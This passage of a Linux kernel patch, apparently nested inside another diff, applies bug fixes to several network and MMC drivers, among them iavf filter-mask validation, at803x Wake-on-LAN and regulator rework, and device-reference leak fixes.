+--- a/drivers/mmc/host/wbsd.c
++++ b/drivers/mmc/host/wbsd.c
+@@ -1705,8 +1705,6 @@ static int wbsd_init(struct device *dev, int base, int irq, int dma,
+ 
+ 		wbsd_release_resources(host);
+ 		wbsd_free_mmc(dev);
+-
+-		mmc_free_host(mmc);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index b69bd44ada1f2..a73008b9e0b3c 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3006,6 +3006,14 @@ static void mv88e6xxx_hardware_reset(struct mv88e6xxx_chip *chip)
+ 
+ 	/* If there is a GPIO connected to the reset pin, toggle it */
+ 	if (gpiod) {
++		/* If the switch has just been reset and not yet completed
++		 * loading EEPROM, the reset may interrupt the I2C transaction
++		 * mid-byte, causing the first EEPROM read after the reset
++		 * from the wrong location resulting in the switch booting
++		 * to wrong mode and inoperable.
++		 */
++		mv88e6xxx_g1_wait_eeprom_done(chip);
++
+ 		gpiod_set_value_cansleep(gpiod, 1);
+ 		usleep_range(10000, 20000);
+ 		gpiod_set_value_cansleep(gpiod, 0);
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index abd6cc0cd641f..5fb991835078a 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -5070,6 +5070,9 @@ static int __maybe_unused macb_suspend(struct device *dev)
+ 	unsigned int q;
+ 	int err;
+ 
++	if (!device_may_wakeup(&bp->dev->dev))
++		phy_exit(bp->sgmii_phy);
++
+ 	if (!netif_running(netdev))
+ 		return 0;
+ 
+@@ -5130,7 +5133,6 @@ static int __maybe_unused macb_suspend(struct device *dev)
+ 	if (!(bp->wol & MACB_WOL_ENABLED)) {
+ 		rtnl_lock();
+ 		phylink_stop(bp->phylink);
+-		phy_exit(bp->sgmii_phy);
+ 		rtnl_unlock();
+ 		spin_lock_irqsave(&bp->lock, flags);
+ 		macb_reset_hw(bp);
+@@ -5160,6 +5162,9 @@ static int __maybe_unused macb_resume(struct device *dev)
+ 	unsigned int q;
+ 	int err;
+ 
++	if (!device_may_wakeup(&bp->dev->dev))
++		phy_init(bp->sgmii_phy);
++
+ 	if (!netif_running(netdev))
+ 		return 0;
+ 
+@@ -5220,8 +5225,6 @@ static int __maybe_unused macb_resume(struct device *dev)
+ 	macb_set_rx_mode(netdev);
+ 	macb_restore_features(bp);
+ 	rtnl_lock();
+-	if (!device_may_wakeup(&bp->dev->dev))
+-		phy_init(bp->sgmii_phy);
+ 
+ 	phylink_start(bp->phylink);
+ 	rtnl_unlock();
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_nvm.c b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+index 17e3f26eee4a4..779ba907009a5 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_nvm.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+@@ -210,11 +210,11 @@ read_nvm_exit:
+  * @hw: pointer to the HW structure.
+  * @module_pointer: module pointer location in words from the NVM beginning
+  * @offset: offset in words from module start
+- * @words: number of words to write
+- * @data: buffer with words to write to the Shadow RAM
++ * @words: number of words to read
++ * @data: buffer with words to read to the Shadow RAM
+  * @last_command: tells the AdminQ that this is the last command
+  *
+- * Writes a 16 bit words buffer to the Shadow RAM using the admin command.
++ * Reads a 16 bit words buffer to the Shadow RAM using the admin command.
+  **/
+ static int i40e_read_nvm_aq(struct i40e_hw *hw,
+ 			    u8 module_pointer, u32 offset,
+@@ -234,18 +234,18 @@ static int i40e_read_nvm_aq(struct i40e_hw *hw,
+ 	 */
+ 	if ((offset + words) > hw->nvm.sr_size)
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "NVM write error: offset %d beyond Shadow RAM limit %d\n",
++			   "NVM read error: offset %d beyond Shadow RAM limit %d\n",
+ 			   (offset + words), hw->nvm.sr_size);
+ 	else if (words > I40E_SR_SECTOR_SIZE_IN_WORDS)
+-		/* We can write only up to 4KB (one sector), in one AQ write */
++		/* We can read only up to 4KB (one sector), in one AQ write */
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "NVM write fail error: tried to write %d words, limit is %d.\n",
++			   "NVM read fail error: tried to read %d words, limit is %d.\n",
+ 			   words, I40E_SR_SECTOR_SIZE_IN_WORDS);
+ 	else if (((offset + (words - 1)) / I40E_SR_SECTOR_SIZE_IN_WORDS)
+ 		 != (offset / I40E_SR_SECTOR_SIZE_IN_WORDS))
+-		/* A single write cannot spread over two sectors */
++		/* A single read cannot spread over two sectors */
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "NVM write error: cannot spread over two sectors in a single write offset=%d words=%d\n",
++			   "NVM read error: cannot spread over two sectors in a single read offset=%d words=%d\n",
+ 			   offset, words);
+ 	else
+ 		ret_code = i40e_aq_read_nvm(hw, module_pointer,
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index f544d2b0abdbd..fe912b1c468ef 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -1289,6 +1289,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		fltr->ip_mask.src_port = fsp->m_u.tcp_ip4_spec.psrc;
+ 		fltr->ip_mask.dst_port = fsp->m_u.tcp_ip4_spec.pdst;
+ 		fltr->ip_mask.tos = fsp->m_u.tcp_ip4_spec.tos;
++		fltr->ip_ver = 4;
+ 		break;
+ 	case AH_V4_FLOW:
+ 	case ESP_V4_FLOW:
+@@ -1300,6 +1301,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		fltr->ip_mask.v4_addrs.dst_ip = fsp->m_u.ah_ip4_spec.ip4dst;
+ 		fltr->ip_mask.spi = fsp->m_u.ah_ip4_spec.spi;
+ 		fltr->ip_mask.tos = fsp->m_u.ah_ip4_spec.tos;
++		fltr->ip_ver = 4;
+ 		break;
+ 	case IPV4_USER_FLOW:
+ 		fltr->ip_data.v4_addrs.src_ip = fsp->h_u.usr_ip4_spec.ip4src;
+@@ -1312,6 +1314,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		fltr->ip_mask.l4_header = fsp->m_u.usr_ip4_spec.l4_4_bytes;
+ 		fltr->ip_mask.tos = fsp->m_u.usr_ip4_spec.tos;
+ 		fltr->ip_mask.proto = fsp->m_u.usr_ip4_spec.proto;
++		fltr->ip_ver = 4;
+ 		break;
+ 	case TCP_V6_FLOW:
+ 	case UDP_V6_FLOW:
+@@ -1330,6 +1333,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		fltr->ip_mask.src_port = fsp->m_u.tcp_ip6_spec.psrc;
+ 		fltr->ip_mask.dst_port = fsp->m_u.tcp_ip6_spec.pdst;
+ 		fltr->ip_mask.tclass = fsp->m_u.tcp_ip6_spec.tclass;
++		fltr->ip_ver = 6;
+ 		break;
+ 	case AH_V6_FLOW:
+ 	case ESP_V6_FLOW:
+@@ -1345,6 +1349,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		       sizeof(struct in6_addr));
+ 		fltr->ip_mask.spi = fsp->m_u.ah_ip6_spec.spi;
+ 		fltr->ip_mask.tclass = fsp->m_u.ah_ip6_spec.tclass;
++		fltr->ip_ver = 6;
+ 		break;
+ 	case IPV6_USER_FLOW:
+ 		memcpy(&fltr->ip_data.v6_addrs.src_ip, fsp->h_u.usr_ip6_spec.ip6src,
+@@ -1361,6 +1366,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		fltr->ip_mask.l4_header = fsp->m_u.usr_ip6_spec.l4_4_bytes;
+ 		fltr->ip_mask.tclass = fsp->m_u.usr_ip6_spec.tclass;
+ 		fltr->ip_mask.proto = fsp->m_u.usr_ip6_spec.l4_proto;
++		fltr->ip_ver = 6;
+ 		break;
+ 	case ETHER_FLOW:
+ 		fltr->eth_data.etype = fsp->h_u.ether_spec.h_proto;
+@@ -1371,6 +1377,10 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		return -EINVAL;
+ 	}
+ 
++	err = iavf_validate_fdir_fltr_masks(adapter, fltr);
++	if (err)
++		return err;
++
+ 	if (iavf_fdir_is_dup_fltr(adapter, fltr))
+ 		return -EEXIST;
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_fdir.c b/drivers/net/ethernet/intel/iavf/iavf_fdir.c
+index 505e82ebafe47..03e774bd2a5b4 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_fdir.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_fdir.c
+@@ -18,6 +18,79 @@ static const struct in6_addr ipv6_addr_full_mask = {
+ 	}
+ };
+ 
++static const struct in6_addr ipv6_addr_zero_mask = {
++	.in6_u = {
++		.u6_addr8 = {
++			0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
++		}
++	}
++};
++
++/**
++ * iavf_validate_fdir_fltr_masks - validate Flow Director filter fields masks
++ * @adapter: pointer to the VF adapter structure
++ * @fltr: Flow Director filter data structure
++ *
++ * Returns 0 if all masks of packet fields are either full or empty. Returns
++ * error on at least one partial mask.
++ */
++int iavf_validate_fdir_fltr_masks(struct iavf_adapter *adapter,
++				  struct iavf_fdir_fltr *fltr)
++{
++	if (fltr->eth_mask.etype && fltr->eth_mask.etype != htons(U16_MAX))
++		goto partial_mask;
++
++	if (fltr->ip_ver == 4) {
++		if (fltr->ip_mask.v4_addrs.src_ip &&
++		    fltr->ip_mask.v4_addrs.src_ip != htonl(U32_MAX))
++			goto partial_mask;
++
++		if (fltr->ip_mask.v4_addrs.dst_ip &&
++		    fltr->ip_mask.v4_addrs.dst_ip != htonl(U32_MAX))
++			goto partial_mask;
++
++		if (fltr->ip_mask.tos && fltr->ip_mask.tos != U8_MAX)
++			goto partial_mask;
++	} else if (fltr->ip_ver == 6) {
++		if (memcmp(&fltr->ip_mask.v6_addrs.src_ip, &ipv6_addr_zero_mask,
++			   sizeof(struct in6_addr)) &&
++		    memcmp(&fltr->ip_mask.v6_addrs.src_ip, &ipv6_addr_full_mask,
++			   sizeof(struct in6_addr)))
++			goto partial_mask;
++
++		if (memcmp(&fltr->ip_mask.v6_addrs.dst_ip, &ipv6_addr_zero_mask,
++			   sizeof(struct in6_addr)) &&
++		    memcmp(&fltr->ip_mask.v6_addrs.dst_ip, &ipv6_addr_full_mask,
++			   sizeof(struct in6_addr)))
++			goto partial_mask;
++
++		if (fltr->ip_mask.tclass && fltr->ip_mask.tclass != U8_MAX)
++			goto partial_mask;
++	}
++
++	if (fltr->ip_mask.proto && fltr->ip_mask.proto != U8_MAX)
++		goto partial_mask;
++
++	if (fltr->ip_mask.src_port && fltr->ip_mask.src_port != htons(U16_MAX))
++		goto partial_mask;
++
++	if (fltr->ip_mask.dst_port && fltr->ip_mask.dst_port != htons(U16_MAX))
++		goto partial_mask;
++
++	if (fltr->ip_mask.spi && fltr->ip_mask.spi != htonl(U32_MAX))
++		goto partial_mask;
++
++	if (fltr->ip_mask.l4_header &&
++	    fltr->ip_mask.l4_header != htonl(U32_MAX))
++		goto partial_mask;
++
++	return 0;
++
++partial_mask:
++	dev_err(&adapter->pdev->dev, "Failed to add Flow Director filter, partial masks are not supported\n");
++	return -EOPNOTSUPP;
++}
++
+ /**
+  * iavf_pkt_udp_no_pay_len - the length of UDP packet without payload
+  * @fltr: Flow Director filter data structure
+@@ -263,8 +336,6 @@ iavf_fill_fdir_ip4_hdr(struct iavf_fdir_fltr *fltr,
+ 		VIRTCHNL_ADD_PROTO_HDR_FIELD_BIT(hdr, IPV4, DST);
+ 	}
+ 
+-	fltr->ip_ver = 4;
+-
+ 	return 0;
+ }
+ 
+@@ -309,8 +380,6 @@ iavf_fill_fdir_ip6_hdr(struct iavf_fdir_fltr *fltr,
+ 		VIRTCHNL_ADD_PROTO_HDR_FIELD_BIT(hdr, IPV6, DST);
+ 	}
+ 
+-	fltr->ip_ver = 6;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_fdir.h b/drivers/net/ethernet/intel/iavf/iavf_fdir.h
+index 33c55c366315b..9eb9f73f6adf3 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_fdir.h
++++ b/drivers/net/ethernet/intel/iavf/iavf_fdir.h
+@@ -110,6 +110,8 @@ struct iavf_fdir_fltr {
+ 	struct virtchnl_fdir_add vc_add_msg;
+ };
+ 
++int iavf_validate_fdir_fltr_masks(struct iavf_adapter *adapter,
++				  struct iavf_fdir_fltr *fltr);
+ int iavf_fill_fdir_add_msg(struct iavf_adapter *adapter, struct iavf_fdir_fltr *fltr);
+ void iavf_print_fdir_fltr(struct iavf_adapter *adapter, struct iavf_fdir_fltr *fltr);
+ bool iavf_fdir_is_dup_fltr(struct iavf_adapter *adapter, struct iavf_fdir_fltr *fltr);
+diff --git a/drivers/net/ethernet/intel/ice/ice_eswitch.c b/drivers/net/ethernet/intel/ice/ice_eswitch.c
+index f9f15acae90a0..2ffe5708a045b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_eswitch.c
++++ b/drivers/net/ethernet/intel/ice/ice_eswitch.c
+@@ -562,6 +562,12 @@ ice_eswitch_mode_set(struct devlink *devlink, u16 mode,
+ 		break;
+ 	case DEVLINK_ESWITCH_MODE_SWITCHDEV:
+ 	{
++		if (ice_is_adq_active(pf)) {
++			dev_err(ice_pf_to_dev(pf), "Couldn't change eswitch mode to switchdev - ADQ is active. Delete ADQ configs and try again, e.g. tc qdisc del dev $PF root");
++			NL_SET_ERR_MSG_MOD(extack, "Couldn't change eswitch mode to switchdev - ADQ is active. Delete ADQ configs and try again, e.g. tc qdisc del dev $PF root");
++			return -EOPNOTSUPP;
++		}
++
+ 		dev_info(ice_pf_to_dev(pf), "PF %d changed eswitch mode to switchdev",
+ 			 pf->hw.pf_id);
+ 		NL_SET_ERR_MSG_MOD(extack, "Changed eswitch mode to switchdev");
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index a771e597795d3..7a00d297be3a9 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -8787,6 +8787,11 @@ ice_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ 						  ice_setup_tc_block_cb,
+ 						  np, np, true);
+ 	case TC_SETUP_QDISC_MQPRIO:
++		if (ice_is_eswitch_mode_switchdev(pf)) {
++			netdev_err(netdev, "TC MQPRIO offload not supported, switchdev is enabled\n");
++			return -EOPNOTSUPP;
++		}
++
+ 		if (pf->adev) {
+ 			mutex_lock(&pf->adev_mutex);
+ 			device_lock(&pf->adev->dev);
+diff --git a/drivers/net/ethernet/intel/igc/igc_base.h b/drivers/net/ethernet/intel/igc/igc_base.h
+index ce530f5fd7bda..52849f5e8048d 100644
+--- a/drivers/net/ethernet/intel/igc/igc_base.h
++++ b/drivers/net/ethernet/intel/igc/igc_base.h
+@@ -85,8 +85,13 @@ union igc_adv_rx_desc {
+ #define IGC_RXDCTL_SWFLUSH		0x04000000 /* Receive Software Flush */
+ 
+ /* SRRCTL bit definitions */
+-#define IGC_SRRCTL_BSIZEPKT_SHIFT		10 /* Shift _right_ */
+-#define IGC_SRRCTL_BSIZEHDRSIZE_SHIFT		2  /* Shift _left_ */
+-#define IGC_SRRCTL_DESCTYPE_ADV_ONEBUF	0x02000000
++#define IGC_SRRCTL_BSIZEPKT_MASK	GENMASK(6, 0)
++#define IGC_SRRCTL_BSIZEPKT(x)		FIELD_PREP(IGC_SRRCTL_BSIZEPKT_MASK, \
++					(x) / 1024) /* in 1 KB resolution */
++#define IGC_SRRCTL_BSIZEHDR_MASK	GENMASK(13, 8)
++#define IGC_SRRCTL_BSIZEHDR(x)		FIELD_PREP(IGC_SRRCTL_BSIZEHDR_MASK, \
++					(x) / 64) /* in 64 bytes resolution */
++#define IGC_SRRCTL_DESCTYPE_MASK	GENMASK(27, 25)
++#define IGC_SRRCTL_DESCTYPE_ADV_ONEBUF	FIELD_PREP(IGC_SRRCTL_DESCTYPE_MASK, 1)
+ 
+ #endif /* _IGC_BASE_H */
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index d877dc0f87f71..2f3947cf513bd 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -675,8 +675,11 @@ static void igc_configure_rx_ring(struct igc_adapter *adapter,
+ 	else
+ 		buf_size = IGC_RXBUFFER_2048;
+ 
+-	srrctl = IGC_RX_HDR_LEN << IGC_SRRCTL_BSIZEHDRSIZE_SHIFT;
+-	srrctl |= buf_size >> IGC_SRRCTL_BSIZEPKT_SHIFT;
++	srrctl = rd32(IGC_SRRCTL(reg_idx));
++	srrctl &= ~(IGC_SRRCTL_BSIZEPKT_MASK | IGC_SRRCTL_BSIZEHDR_MASK |
++		    IGC_SRRCTL_DESCTYPE_MASK);
++	srrctl |= IGC_SRRCTL_BSIZEHDR(IGC_RX_HDR_LEN);
++	srrctl |= IGC_SRRCTL_BSIZEPKT(buf_size);
+ 	srrctl |= IGC_SRRCTL_DESCTYPE_ADV_ONEBUF;
+ 
+ 	wr32(IGC_SRRCTL(reg_idx), srrctl);
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+index 8979dd05e873f..d4ec46d1c8cfb 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+@@ -1121,12 +1121,12 @@ static void octep_remove(struct pci_dev *pdev)
+ 	if (!oct)
+ 		return;
+ 
+-	cancel_work_sync(&oct->tx_timeout_task);
+ 	cancel_work_sync(&oct->ctrl_mbox_task);
+ 	netdev = oct->netdev;
+ 	if (netdev->reg_state == NETREG_REGISTERED)
+ 		unregister_netdev(netdev);
+ 
++	cancel_work_sync(&oct->tx_timeout_task);
+ 	octep_device_cleanup(oct);
+ 	pci_release_mem_regions(pdev);
+ 	free_netdev(netdev);
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_main.c b/drivers/net/ethernet/qlogic/qede/qede_main.c
+index e8d427c7d1cff..dc43e74147fbf 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_main.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_main.c
+@@ -177,6 +177,15 @@ static int qede_sriov_configure(struct pci_dev *pdev, int num_vfs_param)
+ }
+ #endif
+ 
++static int __maybe_unused qede_suspend(struct device *dev)
++{
++	dev_info(dev, "Device does not support suspend operation\n");
++
++	return -EOPNOTSUPP;
++}
++
++static DEFINE_SIMPLE_DEV_PM_OPS(qede_pm_ops, qede_suspend, NULL);
++
+ static const struct pci_error_handlers qede_err_handler = {
+ 	.error_detected = qede_io_error_detected,
+ };
+@@ -191,6 +200,7 @@ static struct pci_driver qede_pci_driver = {
+ 	.sriov_configure = qede_sriov_configure,
+ #endif
+ 	.err_handler = &qede_err_handler,
++	.driver.pm = &qede_pm_ops,
+ };
+ 
+ static struct qed_eth_cb_ops qede_ll_ops = {
+diff --git a/drivers/net/ethernet/sfc/tc.c b/drivers/net/ethernet/sfc/tc.c
+index 3478860d40232..d312147cd2dd7 100644
+--- a/drivers/net/ethernet/sfc/tc.c
++++ b/drivers/net/ethernet/sfc/tc.c
+@@ -603,10 +603,10 @@ int efx_init_tc(struct efx_nic *efx)
+ 	rc = efx_tc_configure_rep_mport(efx);
+ 	if (rc)
+ 		return rc;
+-	efx->tc->up = true;
+ 	rc = flow_indr_dev_register(efx_tc_indr_setup_cb, efx);
+ 	if (rc)
+ 		return rc;
++	efx->tc->up = true;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/pcs/pcs-rzn1-miic.c b/drivers/net/pcs/pcs-rzn1-miic.c
+index c1424119e8212..847ab37f13671 100644
+--- a/drivers/net/pcs/pcs-rzn1-miic.c
++++ b/drivers/net/pcs/pcs-rzn1-miic.c
+@@ -317,15 +317,21 @@ struct phylink_pcs *miic_create(struct device *dev, struct device_node *np)
+ 
+ 	pdev = of_find_device_by_node(pcs_np);
+ 	of_node_put(pcs_np);
+-	if (!pdev || !platform_get_drvdata(pdev))
++	if (!pdev || !platform_get_drvdata(pdev)) {
++		if (pdev)
++			put_device(&pdev->dev);
+ 		return ERR_PTR(-EPROBE_DEFER);
++	}
+ 
+ 	miic_port = kzalloc(sizeof(*miic_port), GFP_KERNEL);
+-	if (!miic_port)
++	if (!miic_port) {
++		put_device(&pdev->dev);
+ 		return ERR_PTR(-ENOMEM);
++	}
+ 
+ 	miic = platform_get_drvdata(pdev);
+ 	device_link_add(dev, miic->dev, DL_FLAG_AUTOREMOVE_CONSUMER);
++	put_device(&pdev->dev);
+ 
+ 	miic_port->miic = miic;
+ 	miic_port->port = port - 1;
+diff --git a/drivers/net/phy/at803x.c b/drivers/net/phy/at803x.c
+index 61824a463df85..edd4b1e58d965 100644
+--- a/drivers/net/phy/at803x.c
++++ b/drivers/net/phy/at803x.c
+@@ -305,7 +305,6 @@ struct at803x_priv {
+ 	bool is_1000basex;
+ 	struct regulator_dev *vddio_rdev;
+ 	struct regulator_dev *vddh_rdev;
+-	struct regulator *vddio;
+ 	u64 stats[ARRAY_SIZE(at803x_hw_stats)];
+ };
+ 
+@@ -461,21 +460,27 @@ static int at803x_set_wol(struct phy_device *phydev,
+ 			phy_write_mmd(phydev, MDIO_MMD_PCS, offsets[i],
+ 				      mac[(i * 2) + 1] | (mac[(i * 2)] << 8));
+ 
+-		/* Enable WOL function */
+-		ret = phy_modify_mmd(phydev, MDIO_MMD_PCS, AT803X_PHY_MMD3_WOL_CTRL,
+-				0, AT803X_WOL_EN);
+-		if (ret)
+-			return ret;
++		/* Enable WOL function for 1588 */
++		if (phydev->drv->phy_id == ATH8031_PHY_ID) {
++			ret = phy_modify_mmd(phydev, MDIO_MMD_PCS,
++					     AT803X_PHY_MMD3_WOL_CTRL,
++					     0, AT803X_WOL_EN);
++			if (ret)
++				return ret;
++		}
+ 		/* Enable WOL interrupt */
+ 		ret = phy_modify(phydev, AT803X_INTR_ENABLE, 0, AT803X_INTR_ENABLE_WOL);
+ 		if (ret)
+ 			return ret;
+ 	} else {
+-		/* Disable WoL function */
+-		ret = phy_modify_mmd(phydev, MDIO_MMD_PCS, AT803X_PHY_MMD3_WOL_CTRL,
+-				AT803X_WOL_EN, 0);
+-		if (ret)
+-			return ret;
++		/* Disable WoL function for 1588 */
++		if (phydev->drv->phy_id == ATH8031_PHY_ID) {
++			ret = phy_modify_mmd(phydev, MDIO_MMD_PCS,
++					     AT803X_PHY_MMD3_WOL_CTRL,
++					     AT803X_WOL_EN, 0);
++			if (ret)
++				return ret;
++		}
+ 		/* Disable WOL interrupt */
+ 		ret = phy_modify(phydev, AT803X_INTR_ENABLE, AT803X_INTR_ENABLE_WOL, 0);
+ 		if (ret)
+@@ -510,11 +515,11 @@ static void at803x_get_wol(struct phy_device *phydev,
+ 	wol->supported = WAKE_MAGIC;
+ 	wol->wolopts = 0;
+ 
+-	value = phy_read_mmd(phydev, MDIO_MMD_PCS, AT803X_PHY_MMD3_WOL_CTRL);
++	value = phy_read(phydev, AT803X_INTR_ENABLE);
+ 	if (value < 0)
+ 		return;
+ 
+-	if (value & AT803X_WOL_EN)
++	if (value & AT803X_INTR_ENABLE_WOL)
+ 		wol->wolopts |= WAKE_MAGIC;
+ }
+ 
+@@ -825,11 +830,11 @@ static int at803x_parse_dt(struct phy_device *phydev)
+ 		if (ret < 0)
+ 			return ret;
+ 
+-		priv->vddio = devm_regulator_get_optional(&phydev->mdio.dev,
+-							  "vddio");
+-		if (IS_ERR(priv->vddio)) {
++		ret = devm_regulator_get_enable_optional(&phydev->mdio.dev,
++							 "vddio");
++		if (ret) {
+ 			phydev_err(phydev, "failed to get VDDIO regulator\n");
+-			return PTR_ERR(priv->vddio);
++			return ret;
+ 		}
+ 
+ 		/* Only AR8031/8033 support 1000Base-X for SFP modules */
+@@ -857,23 +862,12 @@ static int at803x_probe(struct phy_device *phydev)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (priv->vddio) {
+-		ret = regulator_enable(priv->vddio);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+ 	if (phydev->drv->phy_id == ATH8031_PHY_ID) {
+ 		int ccr = phy_read(phydev, AT803X_REG_CHIP_CONFIG);
+ 		int mode_cfg;
+-		struct ethtool_wolinfo wol = {
+-			.wolopts = 0,
+-		};
+ 
+-		if (ccr < 0) {
+-			ret = ccr;
+-			goto err;
+-		}
++		if (ccr < 0)
++			return ccr;
+ 		mode_cfg = ccr & AT803X_MODE_CFG_MASK;
+ 
+ 		switch (mode_cfg) {
+@@ -887,29 +881,17 @@ static int at803x_probe(struct phy_device *phydev)
+ 			break;
+ 		}
+ 
+-		/* Disable WOL by default */
+-		ret = at803x_set_wol(phydev, &wol);
+-		if (ret < 0) {
+-			phydev_err(phydev, "failed to disable WOL on probe: %d\n", ret);
+-			goto err;
+-		}
++		/* Disable WoL in 1588 register which is enabled
++		 * by default
++		 */
++		ret = phy_modify_mmd(phydev, MDIO_MMD_PCS,
++				     AT803X_PHY_MMD3_WOL_CTRL,
++				     AT803X_WOL_EN, 0);
++		if (ret)
++			return ret;
+ 	}
+ 
+ 	return 0;
+-
+-err:
+-	if (priv->vddio)
+-		regulator_disable(priv->vddio);
+-
+-	return ret;
+-}
+-
+-static void at803x_remove(struct phy_device *phydev)
+-{
+-	struct at803x_priv *priv = phydev->priv;
+-
+-	if (priv->vddio)
+-		regulator_disable(priv->vddio);
+ }
+ 
+ static int at803x_get_features(struct phy_device *phydev)
+@@ -2022,7 +2004,6 @@ static struct phy_driver at803x_driver[] = {
+ 	.name			= "Qualcomm Atheros AR8035",
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.config_aneg		= at803x_config_aneg,
+ 	.config_init		= at803x_config_init,
+ 	.soft_reset		= genphy_soft_reset,
+@@ -2044,7 +2025,6 @@ static struct phy_driver at803x_driver[] = {
+ 	.name			= "Qualcomm Atheros AR8030",
+ 	.phy_id_mask		= AT8030_PHY_ID_MASK,
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.config_init		= at803x_config_init,
+ 	.link_change_notify	= at803x_link_change_notify,
+ 	.set_wol		= at803x_set_wol,
+@@ -2060,7 +2040,6 @@ static struct phy_driver at803x_driver[] = {
+ 	.name			= "Qualcomm Atheros AR8031/AR8033",
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.config_init		= at803x_config_init,
+ 	.config_aneg		= at803x_config_aneg,
+ 	.soft_reset		= genphy_soft_reset,
+@@ -2083,7 +2062,6 @@ static struct phy_driver at803x_driver[] = {
+ 	PHY_ID_MATCH_EXACT(ATH8032_PHY_ID),
+ 	.name			= "Qualcomm Atheros AR8032",
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	.config_init		= at803x_config_init,
+ 	.link_change_notify	= at803x_link_change_notify,
+@@ -2099,7 +2077,6 @@ static struct phy_driver at803x_driver[] = {
+ 	PHY_ID_MATCH_EXACT(ATH9331_PHY_ID),
+ 	.name			= "Qualcomm Atheros AR9331 built-in PHY",
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.suspend		= at803x_suspend,
+ 	.resume			= at803x_resume,
+ 	.flags			= PHY_POLL_CABLE_TEST,
+@@ -2116,7 +2093,6 @@ static struct phy_driver at803x_driver[] = {
+ 	PHY_ID_MATCH_EXACT(QCA9561_PHY_ID),
+ 	.name			= "Qualcomm Atheros QCA9561 built-in PHY",
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.suspend		= at803x_suspend,
+ 	.resume			= at803x_resume,
+ 	.flags			= PHY_POLL_CABLE_TEST,
+@@ -2182,7 +2158,6 @@ static struct phy_driver at803x_driver[] = {
+ 	.name			= "Qualcomm QCA8081",
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.config_intr		= at803x_config_intr,
+ 	.handle_interrupt	= at803x_handle_interrupt,
+ 	.get_tunable		= at803x_get_tunable,
+diff --git a/drivers/net/phy/broadcom.c b/drivers/net/phy/broadcom.c
+index ad71c88c87e78..f9ad8902100f3 100644
+--- a/drivers/net/phy/broadcom.c
++++ b/drivers/net/phy/broadcom.c
+@@ -486,6 +486,17 @@ static int bcm54xx_resume(struct phy_device *phydev)
+ 	return bcm54xx_config_init(phydev);
+ }
+ 
++static int bcm54810_read_mmd(struct phy_device *phydev, int devnum, u16 regnum)
++{
++	return -EOPNOTSUPP;
++}
++
++static int bcm54810_write_mmd(struct phy_device *phydev, int devnum, u16 regnum,
++			      u16 val)
++{
++	return -EOPNOTSUPP;
++}
++
+ static int bcm54811_config_init(struct phy_device *phydev)
+ {
